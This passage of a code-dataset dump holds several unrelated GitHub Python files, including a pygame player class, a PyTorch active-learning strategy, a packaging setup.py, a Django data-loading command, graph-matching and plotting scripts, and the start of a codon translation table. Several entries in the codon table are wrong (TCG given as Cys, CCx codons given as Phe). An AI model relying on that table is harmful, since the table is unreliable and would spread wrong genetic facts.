= pressedKeys[K_w] or pressedKeys[K_a] or pressedKeys[K_s] or pressedKeys[K_d]\n\n if pressedKeys[K_w]:\n if(not self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2 - SPEED, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n if (self.posY < self.screenSize[1] / 2):\n self.gameworld.IncreaseOffsetY(SPEED)\n else:\n self.posY -= SPEED\n \n if pressedKeys[K_a]:\n self.posX -= SPEED\n if (self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n self.posX += SPEED\n \n if pressedKeys[K_s]:\n if (self.posY + SPEED < self.screenSize[1] - PLAYER_SIZE[1]):\n self.posY += SPEED\n if (self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n self.posY -= SPEED\n\n if pressedKeys[K_d]:\n self.posX += SPEED\n if (self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n self.posX -= SPEED\n\n currentTime = pygame.time.get_ticks()\n\n if (currentTime >= self.nextFrameTime and self.isMoving):\n self.nextFrameTime = currentTime + ANIMATION_SPEED\n self.NextFrame()\n\n currentHitbox = Rect(PLAYER_HITBOX_SIZE[0] / 2 + self.posX, PLAYER_HITBOX_SIZE[1] / 2 + self.posY, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1])\n\n if (self.game.frameCounter % 2 == 0 and self.CheckCollisionWithMonsters(currentHitbox)): # Check collisions with monsters on even frames\n self.game.levelController.savedDeaths += 1\n self.gameworld.entitySounds[\"playerDeath\"].play()\n self.game.TriggerGameOver(False)\n elif (self.game.frameCounter % 2 == 1): # Check collisions with collectables on odd frames\n self.CheckCollisionWithCollectables(currentHitbox)\n\n def SetAnimation(self, currentWeapon): # Change animations based on weapon held\n if currentWeapon == WeaponTypes.REVOLVER:\n self.currentAnimation = self.pistolFrames\n elif currentWeapon == WeaponTypes.RIFLE:\n self.currentAnimation = self.rifleFrames\n elif currentWeapon == WeaponTypes.SNIPER:\n self.currentAnimation = self.sniperFrames\n elif currentWeapon == WeaponTypes.LMG:\n self.currentAnimation = self.lmgFrames\n else:\n self.currentAnimation = self.walkingFrames\n\n self.NextFrame() # Start new animation\n \n def NextFrame(self): # Switch to the animation's next frame\n self.animFrameCounter = (self.animFrameCounter + 1) % len(self.currentAnimation)\n self.image = self.currentAnimation[self.animFrameCounter]\n\n def LookAtMouse(self, mousePos):\n relativeX, relativeY = mousePos[0] - (PLAYER_SIZE[0] / 2 + self.posX), mousePos[1] - (PLAYER_SIZE[1] / 2 + self.posY)\n self.angle = (180 / pi) * -atan2(relativeY, relativeX)\n self.rotatedImage = pygame.transform.rotate(self.image, floor(self.angle))\n \n def SwitchWeapon(self, nextWeapon):\n if (nextWeapon): # Switch to next weapon\n self.equippedWeaponIndex = (self.equippedWeaponIndex + 1) % len(self.weaponInventory)\n else: # Switch to previous weapon\n self.equippedWeaponIndex = self.equippedWeaponIndex - 1 if (self.equippedWeaponIndex > 0) else len(self.weaponInventory) - 1\n\n self.SetAnimation(self.weaponInventory[self.equippedWeaponIndex])\n\n def AddWeapon(self, ammo, duplicateAmmo, weapon):\n if (weapon not in self.weaponInventory):\n self.ammo += ammo\n self.weaponInventory.append(weapon)\n self.equippedWeaponIndex = len(self.weaponInventory) - 1\n self.SetAnimation(self.weaponInventory[self.equippedWeaponIndex])\n else:\n self.ammo += duplicateAmmo\n\n def Attack(self):\n if (self.weaponController.Attack(self.ammo)):\n self.ammo -= 1\n\n def GetPos(self):\n return [self.posX, self.posY]\n\n def GetEquippedWeaponName(self):\n return self.weaponController.weapons[self.weaponInventory[self.equippedWeaponIndex]][0]\n \n def CheckCollisionWithObstacles(self, mainRect):\n playerTileId = (TILES_COUNT_X * floor(self.posY / TILE_SIZE)) + (floor(self.posX / TILE_SIZE))\n\n for y in range(-1, 3): # Only checks obstacles in a 4x4 square around the player\n for x in range(-1, 3):\n checkedTileId = y * TILES_COUNT_X + x + playerTileId\n\n if (checkedTileId in self.gameworld.obstacles and mainRect.colliderect(self.gameworld.obstacles[checkedTileId].hitbox)):\n return True\n\n return False\n\n def CheckCollisionWithMonsters(self, mainRect):\n for monster in self.gameworld.monsters.values():\n if mainRect.colliderect(monster.hitbox):\n return True\n\n return False\n \n def CheckCollisionWithCollectables(self, mainRect):\n for collectable in self.gameworld.collectables.values():\n if not collectable.collected:\n if mainRect.colliderect(Rect(collectable.posX, collectable.posY, collectable.size[0], collectable.size[1])):\n collectable.Pickup()\n return # Max one pickup per frame\n\n def Draw(self, screen):\n self.weaponController.Draw(screen)\n screen.blit(self.rotatedImage, (self.posX, self.posY))\n\n '''# Debug info - Uncomment to show hitboxes : \n pygame.draw.rect(screen, (255, 0, 0), Rect(PLAYER_HITBOX_SIZE[0] / 2 + self.posX, PLAYER_HITBOX_SIZE[1] / 2 + self.posY, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]), 2) #'''","repo_name":"itsseraphii/Transgenesis","sub_path":"scripts/entities/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38322251494","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport sys\n\n\nclass Strategy:\n def __init__(self, X, Y, idxs_lb, net, handler, args):\n self.X = X\n self.Y = Y\n self.idxs_lb = idxs_lb\n self.net = net\n self.handler = handler\n self.args = args\n self.n_pool = len(Y)\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n self.train_losses = []\n self.val_losses = []\n self.train_acc = []\n self.val_acc = []\n self.valX = None\n self.valY = None\n def query(self, n):\n pass\n #test data set\n def set_test_data(self, x, y):\n self.valX = x \n self.valY = y\n def update(self, idxs_lb):\n self.idxs_lb = idxs_lb\n\n def _train(self, epoch, loader_tr, optimizer):\n self.clf.train()\n total_number = len(loader_tr)\n update_rate = 5\n \n # Initiate accuracies and losses per epoch\n final_train_accuracy = 0\n final_train_loss = 0\n final_val_loss = 0\n final_val_acc = 0\n\n for batch_idx, (x, y, idxs) in enumerate(loader_tr):\n x, y = x.to(self.device), y.to(self.device)\n optimizer.zero_grad()\n out, e1 = self.clf(x)\n loss = F.cross_entropy(out, torch.max(y, 1)[1])\n loss.backward()\n optimizer.step()\n if batch_idx % update_rate==0:\n if(batch_idx > 0):\n erase_line()\n progress = batch_idx / total_number * 100\n acc = accuracy_quick(out, y)\n final_train_accuracy = acc\n final_train_loss = loss\n print('Training\\t Progress:\\t %f %%\\tLoss: %f\\t Training Accuracy %0.2f %%' %(progress, loss, acc))\n\n #Validation Load the test data and compute loss and accuracy\n loader_te = DataLoader(self.handler(self.valX, self.valY, transform=self.args['transform']),\n shuffle=False, **self.args['loader_te_args'])\n\n self.clf.eval()\n loss = 0\n n = 0\n predictions = torch.zeros(len(self.valY), dtype=self.valY.dtype)\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n loss += F.cross_entropy(out, torch.max(y, 1)[1])\n n += 1\n pred = out.max(1)[1]\n predictions[idxs] = pred.cpu()\n \n final_val_acc = 100.0 * (torch.max(self.valY, 1)[1]==predictions).sum().item() / len(self.valY)\n final_val_loss = 1.0 * loss/n\n print('\\nValidation\\n=========\\nProgress:\\t 100 %%\\nValidation Loss: %f\\nValidation Accuracy %0.2f %%\\n' %( final_val_loss, final_val_acc))\n return final_train_loss, final_val_loss, final_train_accuracy, final_val_acc\n \n def train(self):\n\n n_epoch = self.args['n_epoch']\n self.clf = self.net().to(self.device)\n optimizer = optim.SGD(self.clf.parameters(), **self.args['optimizer_args'])\n\n idxs_train = np.arange(self.n_pool)[self.idxs_lb]\n loader_tr = DataLoader(self.handler(self.X[idxs_train], self.Y[idxs_train], transform=self.args['transform']),\n shuffle=True, **self.args['loader_tr_args'])\n \n for epoch in range(1, n_epoch+1):\n print(\"=\"*100 + '\\n')\n print('Epoch %d of %d' %(epoch, n_epoch))\n train_loss, val_loss, train_acc, val_acc = self._train(epoch, loader_tr, optimizer)\n\n def predict(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y, transform=self.args['transform']),\n shuffle=False, **self.args['loader_te_args'])\n\n self.clf.eval()\n P = torch.zeros(len(Y), dtype=Y.dtype)\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n\n pred = out.max(1)[1]\n P[idxs] = pred.cpu()\n\n return P\n\n def predict_prob(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y, transform=self.args['transform']),\n shuffle=False, **self.args['loader_te_args'])\n\n self.clf.eval()\n probs = torch.zeros([len(Y), len(np.unique(Y))])\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n prob = F.softmax(out, dim=1)\n probs[idxs] = prob.cpu()\n \n return probs\n\n","repo_name":"Kartos102/artificial-intelligence","sub_path":"goverment_trace/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20898804165","text":"\"\"\"\r\nIn order to work properly, this script must be put one layer/folder/directory\r\noutside of pdbparser package directory.\r\n\"\"\"\r\ntry:\r\n from setuptools import setup\r\nexcept:\r\n from distutils.core import setup\r\nimport fnmatch\r\nfrom distutils.util import convert_path\r\nimport os, sys, glob\r\n\r\n# set package path and name\r\nPACKAGE_PATH = '.'\r\nPACKAGE_NAME = 'pdbparser'\r\n\r\n# check python version\r\nmajor, minor = sys.version_info[:2]\r\nif major==2 and minor!=7:\r\n raise RuntimeError(\"Python version 2.7.x or >=3.x is required.\")\r\n\r\n# automatically create MANIFEST.in\r\ncommands = [# include MANIFEST.in\r\n '# include this file, to ensure we can recreate source distributions',\r\n 'include MANIFEST.in'\r\n # exclude all .log files\r\n '\\n# exclude all logs',\r\n 'global-exclude *.log',\r\n # exclude all pdbparserParams files\r\n '\\n# exclude all pdbparserParams files',\r\n 'global-exclude *pdbparserParams.*',\r\n # exclude all other non necessary files\r\n '\\n# exclude all other non necessary files ',\r\n 'global-exclude .project',\r\n 'global-exclude .pydevproject',\r\n # exclude all of the subversion metadata\r\n '\\n# exclude all of the subversion metadata',\r\n 'global-exclude *.svn*',\r\n 'global-exclude .svn/*',\r\n 'global-exclude *.git*',\r\n 'global-exclude .git/*',\r\n # include all LICENCE files\r\n '\\n# include all license files found',\r\n 'global-include %s/*LICENSE.*'%PACKAGE_NAME,\r\n # include all README files\r\n '\\n# include all readme files found',\r\n 'global-include %s/*README.*'%PACKAGE_NAME,\r\n 'global-include %s/*readme.*'%PACKAGE_NAME]\r\nwith open('MANIFEST.in','w') as fd:\r\n for l in commands:\r\n fd.write(l)\r\n fd.write('\\n')\r\n\r\n# declare classifiers\r\nCLASSIFIERS = \"\"\"\\\r\nDevelopment Status :: 4 - Beta\r\nIntended Audience :: Science/Research\r\nIntended Audience :: Developers\r\nLicense :: OSI Approved :: GNU Affero General Public License v3\r\nProgramming Language :: Python :: 2.7\r\nProgramming Language :: Python :: 3\r\nTopic :: Software Development\r\nTopic :: Software Development :: Build Tools\r\nTopic :: Scientific/Engineering\r\nOperating System :: Microsoft :: Windows\r\nOperating System :: POSIX\r\nOperating System :: Unix\r\nOperating System :: MacOS\r\n\"\"\"\r\n\r\n# create descriptions\r\nLONG_DESCRIPTION = [\"It's a Protein Data Bank (.pdb) files manipulation package that is mainly developed to parse and load, duplicate, manipulate and create pdb files.\",\r\n \"A full description of a pdb file can be found here: http://deposit.rcsb.org/adit/docs/pdb_atom_format.html\",\r\n \"pdbparser atoms configuration can be visualized by vmd software (http://www.ks.uiuc.edu/Research/vmd/) by simply pointing 'VMD_PATH' global variable to the exact path of vmd executable, and using 'visualize' method.\",\r\n \"At any time and stage of data manipulation, a pdb file of all atoms or a subset of atoms can be exported to a pdb file.\"]\r\nDESCRIPTION = [ LONG_DESCRIPTION[0] ]\r\n\r\n## get package info\r\nPACKAGE_INFO={}\r\ninfoPath = convert_path('__pkginfo__.py')\r\nwith open(infoPath) as fd:\r\n exec(fd.read(), PACKAGE_INFO)\r\n\r\n\r\n##############################################################################################\r\n##################################### USEFUL DEFINITIONS #####################################\r\nDATA_EXCLUDE = ('*.py', '*.pyc', '*~', '.*', '*.so', '*.pyd')\r\nEXCLUDE_DIRECTORIES = ('*svn','*git','dist', 'EGG-INFO', '*.egg-info',)\r\n\r\ndef is_package(path):\r\n return (os.path.isdir(path) and os.path.isfile(os.path.join(path, '__init__.py')))\r\n\r\ndef get_packages(path, base=\"\", exclude=None):\r\n if exclude is None:\r\n exclude = []\r\n assert isinstance(exclude, (list, set, tuple)), \"exclude must be a list\"\r\n exclude = [os.path.abspath(e) for e in exclude]\r\n packages = {}\r\n for item in os.listdir(path):\r\n d = os.path.join(path, item)\r\n if sum([e in os.path.abspath(d) for e in exclude]):\r\n continue\r\n if is_package(d):\r\n if base:\r\n module_name = \"%(base)s.%(item)s\" % vars()\r\n else:\r\n module_name = item\r\n packages[module_name] = d\r\n packages.update(get_packages(d, module_name, exclude))\r\n return packages\r\n\r\ndef find_package_data(where='.', package='', exclude=DATA_EXCLUDE,\r\n exclude_directories=EXCLUDE_DIRECTORIES,\r\n only_in_packages=True, show_ignored=False):\r\n out = {}\r\n stack = [(convert_path(where), '', package, only_in_packages)]\r\n while stack:\r\n where, prefix, package, only_in_packages = stack.pop(0)\r\n for name in os.listdir(where):\r\n fn = os.path.join(where, name)\r\n if os.path.isdir(fn):\r\n bad_name = False\r\n for pattern in exclude_directories:\r\n if (fnmatch.fnmatchcase(name, pattern)\r\n or fn.lower() == pattern.lower()):\r\n bad_name = True\r\n if show_ignored:\r\n print >> sys.stderr, (\"Directory %s ignored by pattern %s\" % (fn, pattern))\r\n break\r\n if bad_name:\r\n continue\r\n if (os.path.isfile(os.path.join(fn, '__init__.py')) and not prefix):\r\n if not package:\r\n new_package = name\r\n else:\r\n new_package = package + '.' + name\r\n stack.append((fn, '', new_package, False))\r\n else:\r\n stack.append((fn, prefix + name + '/', package, only_in_packages))\r\n elif package or not only_in_packages:\r\n # is a file\r\n bad_name = False\r\n for pattern in exclude:\r\n if (fnmatch.fnmatchcase(name, pattern)\r\n or fn.lower() == pattern.lower()):\r\n bad_name = True\r\n if show_ignored:\r\n print >> sys.stderr, (\"File %s ignored by pattern %s\" % (fn, pattern))\r\n break\r\n if bad_name:\r\n continue\r\n out.setdefault(package, []).append(prefix+name)\r\n return out\r\n\r\n\r\ndef find_data(where=\".\", exclude=DATA_EXCLUDE, exclude_directories=EXCLUDE_DIRECTORIES, prefix=\"\"):\r\n out = {}\r\n stack = [convert_path(where)]\r\n while stack:\r\n where = stack.pop(0)\r\n for name in os.listdir(where):\r\n fn = os.path.join(where, name)\r\n d = os.path.join(prefix,os.path.dirname(fn))\r\n if os.path.isdir(fn):\r\n stack.append(fn)\r\n else:\r\n bad_name = False\r\n for pattern in exclude:\r\n if (fnmatch.fnmatchcase(name, pattern) or fn.lower() == pattern.lower()):\r\n bad_name = True\r\n break\r\n if bad_name:\r\n continue\r\n out.setdefault(d, []).append(fn)\r\n out = [(k,v) for k, v in out.items()]\r\n return out\r\n\r\n################################## END OF USEFUL DEFINITIONS #################################\r\n##############################################################################################\r\n\r\n\r\n# get packages\r\nPACKAGES = get_packages(path=PACKAGE_PATH, base='pdbparser',\r\n exclude=(os.path.join(PACKAGE_NAME,\"AMD\"),\r\n os.path.join(PACKAGE_NAME,\"docs\")))\r\nPACKAGES[PACKAGE_NAME] = '.'\r\n\r\n# create meta data\r\nmetadata = dict(name = PACKAGE_NAME,\r\n packages=PACKAGES.keys(),\r\n package_dir=PACKAGES,\r\n version= PACKAGE_INFO['__version__'] ,\r\n author=\"Bachir AOUN\",\r\n author_email=\"bachir.aoun@e-aoun.com\",\r\n description = \"\\n\".join(DESCRIPTION),\r\n long_description = \"\\n\".join(LONG_DESCRIPTION),\r\n #url = \"\",\r\n #download_url = \"\",\r\n license = 'GNU',\r\n classifiers=[_f for _f in CLASSIFIERS.split('\\n') if _f],\r\n platforms = [\"Windows\", \"Linux\", \"Solaris\", \"Mac OS-X\", \"Unix\"],\r\n # Dependent packages (distributions)\r\n install_requires=['pysimplelog','pypref'], # it also needs numpy, but this is left for the user to install.\r\n setup_requires=[''],\r\n zip_safe=False,\r\n )\r\n\r\n# setup\r\nsetup(**metadata)\r\n","repo_name":"bachiraoun/pdbparser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":8767,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7299600627","text":"from abqimport import *\nimport setpe\nimport setas\nfrom getgeom import XCALIB, XHAUSER\n\ndef buildBase(baseModelName='both'):\n \"\"\"\n Build the plane strain model / axisymmetric model / both models, and \n delete the original Model-1 or Model-2 etc.\n \n Parameters\n ----------\n baseModelName : str\n Name of the base model, either 'pe' or 'as', or 'both'.\n \"\"\"\n if baseModelName == 'pe':\n setpe.setpe(xcontact=XCALIB)\n elif baseModelName=='as':\n setas.setas(xcontact=XHAUSER)\n elif baseModelName=='both':\n setpe.setpe(xcontact=XCALIB)\n setas.setas(xcontact=XHAUSER)\n for modelName in mdb.models.keys():\n if modelName.startswith('Model-'):\n del mdb.models[modelName]\n return\n","repo_name":"yw5aj/HS2014","sub_path":"createmodel/buildbase.py","file_name":"buildbase.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19722558448","text":"def merge_sort(string):\n \"\"\"Faça o código aqui.\"\"\"\n # Verify if string is empty\n if len(string) == 0:\n return ''\n\n # Lower case string and verify if string has only one character\n case_string = string.lower()\n if len(case_string) <= 1:\n return case_string\n\n # Split string in two parts\n mid = len(case_string) // 2\n left = case_string[:mid]\n right = case_string[mid:]\n\n # Recursive call\n left_half = merge_sort(left)\n right_half = merge_sort(right)\n\n # Merge\n sorted_string = \"\"\n i = j = 0\n # Compare left and right half indexes\n while i < len(left_half) and j < len(right_half):\n if left_half[i] < right_half[j]: # If left index is lower than right,\n sorted_string += left_half[i] # add left index to sorted string\n i += 1\n else:\n sorted_string += right_half[j] # If right index is low/ than left,\n j += 1 # add right index to sorted string\n\n # Add remaining indexes to sorted string\n sorted_string += left_half[i:]\n sorted_string += right_half[j:]\n\n return sorted_string\n\n\ndef is_anagram(first_string, second_string):\n \"\"\"Faça o código aqui.\"\"\"\n # Call merge_sort function to sort strings\n first_string_sorted = merge_sort(first_string)\n second_string_sorted = merge_sort(second_string)\n anagram = False\n\n # Verify if strings are anagrams\n if first_string_sorted == second_string_sorted:\n anagram = True\n # Verify if strings are empty\n if first_string_sorted == '' or second_string_sorted == '':\n anagram = False\n\n return (first_string_sorted, second_string_sorted, anagram)\n","repo_name":"danillo-expedito/project-algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74864582771","text":"import os\nfrom subprocess import call\nimport sys\n\n\n\ndef save_used_cfg(cfg, used_cfg_file):\n with open(used_cfg_file, 'a') as f:\n cfg_str = cfg_string(cfg)\n f.write('%s\\n' % cfg_str)\n\n\ndef run(cfg_file, scriptName):\n\n flags = '--%s %s' % ('config', cfg_file)\n call('python ' + scriptName + '.py' +' %s' % flags, shell=True)\n \n\nif __name__ == \"__main__\":\n\n run(sys.argv[1], sys.argv[2])\n \n \n\n","repo_name":"trxuanha/2swsa","sub_path":"do_exp.py","file_name":"do_exp.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37944327927","text":"from __future__ import annotations\n\nimport asyncio\nimport threading\nfrom typing import Any, Dict\n\n\nclass State(Dict[str, Any]):\n \"\"\"\n An object that can be used to store arbitrary state.\n \"\"\"\n\n def __enter__(self):\n if not hasattr(self, \"sync_lock\"):\n self.sync_lock = threading.Lock()\n self.sync_lock.acquire()\n return self\n\n def __exit__(self, exc_type, value, traceback):\n self.sync_lock.release()\n\n async def __aenter__(self):\n if not hasattr(self, \"async_lock\"):\n self.async_lock = asyncio.Lock()\n await self.async_lock.acquire()\n return self\n\n async def __aexit__(self, exc_type, value, traceback):\n self.async_lock.release()\n\n def __setattr__(self, name: Any, value: Any) -> None:\n self[name] = value\n\n def __getattr__(self, name: Any) -> Any:\n try:\n return self[name]\n except KeyError:\n message = \"'{}' object has no attribute '{}'\"\n raise AttributeError(message.format(self.__class__.__name__, name))\n\n def __delattr__(self, name: Any) -> None:\n del self[name]\n","repo_name":"abersheeran/kui","sub_path":"kui/utils/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":276,"dataset":"github-code","pt":"21"} +{"seq_id":"14538178112","text":"import pandas as pd\n\nfrom django.core.management.base import BaseCommand\n\nfrom reviews.models import (Genre, Title, Category, GenreTitle,\n User, Review, Comment)\n\n\nclass Command(BaseCommand):\n\n df_genre = pd.read_csv('static/data/genre.csv')\n df_category = pd.read_csv('static/data/category.csv')\n df_title = pd.read_csv('static/data/titles.csv')\n df_genre_title = (\n pd.read_csv('static/data/genre_title.csv')\n .rename(columns={'genre_id': 'genre', 'title_id': 'title'})\n )\n df_user = pd.read_csv('static/data/users.csv')[['id',\n 'username',\n 'email',\n 'role']]\n df_review = (pd.read_csv('static/data/review.csv')\n .rename(columns={'title_id': 'title'}))\n df_comment = pd.read_csv('static/data/comments.csv')\n df = {\n 'genre': (df_genre, Genre, 'slug'),\n 'category': (df_category, Category, 'slug'),\n 'title': (df_title, Title, 'id'),\n 'genre_title': (df_genre_title, GenreTitle, 'id'),\n 'author': (df_user, User, 'id'),\n 'review': (df_review, Review, 'id'),\n 'comment': (df_comment, Comment, 'id')\n }\n\n def correct_df(self, data, name):\n data.dropna(inplace=True)\n data.drop_duplicates(name, inplace=True)\n\n def check_all_df(self):\n \"\"\"Убираем дубликаты потенциальных ключей и пустые значения.\"\"\"\n for tek in self.df:\n self.correct_df(self.df[tek][0], self.df[tek][2])\n\n def data_translate(self, data):\n \"\"\"Функ��ия для преобразуем id объектов в объекты.\"\"\"\n for el in data:\n if el in ['genre', 'category']:\n df_t = self.df[el][0] # Датасет соответствующего элемента\n class_el = self.df[el][1]\n el_id = data[el]\n if el_id in df_t['id'].values:\n slug = df_t.set_index('id').loc[el_id, 'slug']\n data[el] = class_el.objects.get(slug=slug)\n else:\n return None\n\n if el in ['author', 'title', 'review']:\n df_t = self.df[el][0] # Датасет соответствующего элемента\n class_el = self.df[el][1]\n el_id = data[el]\n if el_id in df_t['id'].values:\n data[el] = class_el.objects.get(pk=el_id)\n else:\n return None\n\n return data\n\n def handle(self, *args, **options):\n\n self.check_all_df()\n\n for elem in self.df:\n df_t = self.df[elem][0]\n class_t = self.df[elem][1]\n class_t.objects.all().delete()\n\n for ind in df_t.index:\n data = df_t.loc[ind].to_dict()\n data = self.data_translate(data)\n if data:\n if elem in ['genre', 'category']:\n data.pop('id')\n class_t.objects.create(**data)\n\n print(f'Таблица <{class_t.__name__}> наполнена тестовыми данными.'\n f' Количество записей - {class_t.objects.count()}.')\n","repo_name":"Ilya-c4talyst/api_yamdb","sub_path":"api_yamdb/reviews/management/commands/filldb.py","file_name":"filldb.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35262675174","text":"\"\"\"\nTest matching pour 2 graphes avec branch and bound\n\"\"\"\nfrom tools import util, metric, load_graph_and_kernel as load_graph, show_results as sh\nimport numpy as np\nfrom hsic import convex_simple as convex_simple_hsic, branch_and_bound as branch\n\nif __name__ == '__main__':\n noyau = 5 # à changer selon le noyau qu'on veut\n noyaux = [\"structure + coordonnées + profondeur\", \"coordonnées + profondeur \", \"structure + profondeur\",\n \"structure + coordonnées\", \"stucture\", \"coordonnées\", \"profondeur\"]\n K_list, graph_list = load_graph.load_graph_and_kernels(noyau)\n\n # numéros des sujets à comparer (entre 0 et 133)\n s0 = 17\n s1 = 28\n\n g0 = graph_list[s0]\n g1 = graph_list[s1]\n\n k0 = K_list[s0]\n k1 = K_list[s1]\n k0 = util.normalized_matrix(k0) # normalisation des données\n k1 = util.normalized_matrix(k1)\n k0 = util.centered_matrix(k0)\n k1 = util.centered_matrix(k1)\n nb_pits = max(k0.shape[0], k1.shape[0])\n\n\n # préparation des données pour que les matrices à comparer ait la même taille\n # ajout de \"faux\" pit qui ne ressemble qu'à lui même (que des 0 sauf un 1 sur sa colonne)\n K0 = np.eye(nb_pits)\n K1 = np.eye(nb_pits)\n\n if k0.shape[0] == nb_pits:\n K0 = k0\n else:\n for i in range(k0.shape[0]):\n for j in range(k0.shape[1]):\n K0[i, j] = k0[i, j]\n\n if k1.shape[0] == nb_pits:\n K1 = k1\n else:\n for i in range(k1.shape[0]):\n for j in range(k1.shape[1]):\n K1[i, j] = k1[i, j]\n\n # parameters\n mu = 1\n mu_min = 1e-6\n it = 350\n c = 1\n\n print(\"Comparaison des graphes\", s0, \"et\", s1)\n print(\"Noyau :\", noyaux[noyau])\n print(\"Paramètre mu/mu_min/it/c with branch and bound:\", mu, mu_min, it, c)\n\n init = util.init_eig(K0, K1, nb_pits)\n constraint = branch.branch_and_bound(K0, K1, init, c, mu, mu_min, it)\n\n # transformation du résultats pour la visualisation\n match = np.zeros(len(constraint[0]))\n for i, j in constraint[0]:\n match[i] = j\n\n p = np.zeros((nb_pits, nb_pits))\n for i in range(match.shape[0]):\n p[i, int(match[i])] = 1\n\n obj = convex_simple_hsic.calcul_fobj(K0, K1, p)\n print(\"Fonction objectif : \", obj[0])\n print(\"Moyenne des distances géosédiques\", metric.metric_geodesic_for_2(match, g0, g1))\n sh.show_sphere_for_2(match, g0, g1) # visualisation des resultats\n","repo_name":"jujupapaye/graph_matching","sub_path":"executable_matching/two_graph_matching/test_branch.py","file_name":"test_branch.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20791919703","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\n\ndef lines(df: pd.DataFrame, container=st):\n fig = px.line(\n df,\n title=\"\",\n labels={\"date\": \"\", \"value\": \"\"},\n )\n fig.update_traces(mode=\"lines\", hovertemplate=\"%{y:f}\")\n fig.update_layout(\n margin={\"r\": 0, \"l\": 0, \"t\": 0, \"b\": 0},\n plot_bgcolor=\"rgba(0,0,0,0)\",\n legend=dict(\n orientation=\"h\",\n title=\"\",\n x=0,\n y=1.2,\n ),\n hovermode=\"x unified\",\n dragmode=False,\n )\n fig.update_yaxes(\n tickformat=\"%0.2f\",\n gridcolor=\"#ddd\",\n side=\"left\",\n )\n container.plotly_chart(\n fig,\n use_container_width=True,\n config=dict(displayModeBar=False),\n )\n","repo_name":"simprecicchiani/keycloak-events-analytics","sub_path":"charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23944163837","text":"import matplotlib.pyplot as plt # For plotting the barplots\nimport pandas as pd # For table manipulation\nimport logging # For saving progress, modifications, and debugging information\nimport sys # For parsing command line arguments\n\n# Configure logging\nlogging.basicConfig(filename='logs.txt', level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\n# Codon to Amino Acid conversion table\nCODON_TO_AMINO_TABLE = {\n # T C A G\n \"TTT\": \"Phe\", \"TTC\": \"Phe\", \"TTA\": \"Leu\", \"TTG\": \"Leu\",\n \"TCT\": \"Ser\", \"TCC\": \"Ser\", \"TCA\": \"Ser\", \"TCG\": \"Cys\",\n \"TAT\": \"Tyr\", \"TAC\": \"Tyr\", \"TAA\": \"stop\", \"TAG\": \"stop\",\n \"TGT\": \"Cys\", \"TGC\": \"Cys\", \"TGA\": \"stop\", \"TGG\": \"Trp\",\n \"CTT\": \"Leu\", \"CTC\": \"Leu\", \"CTA\": \"Leu\", \"CTG\": \"Leu\",\n \"CCT\": \"Phe\", \"CCC\": \"Phe\", \"CCA\": \"Phe\", \"CCG\": \"Phe\",\n \"CAT\": \"His\", \"CAC\": \"His\", \"CAA\": \"Gln\", \"CAG\": \"Gln\",\n \"CGT\": \"Arg\", \"CGC\": \"Arg\", \"CGA\": \"Arg\", \"CGG\": \"Arg\",\n \"ATT\": \"Ile\", \"ATC\": \"Ile\", \"ATA\": \"Ile\", \"ATG\": \"Met\",\n \"ACT\": \"Thr\", \"ACC\": \"Thr\", \"ACA\": \"Thr\", \"ACG\": \"Thr\",\n \"AAT\": \"Asn\", \"AAC\": \"Asn\", \"AAA\": \"Lys\", \"AAG\": 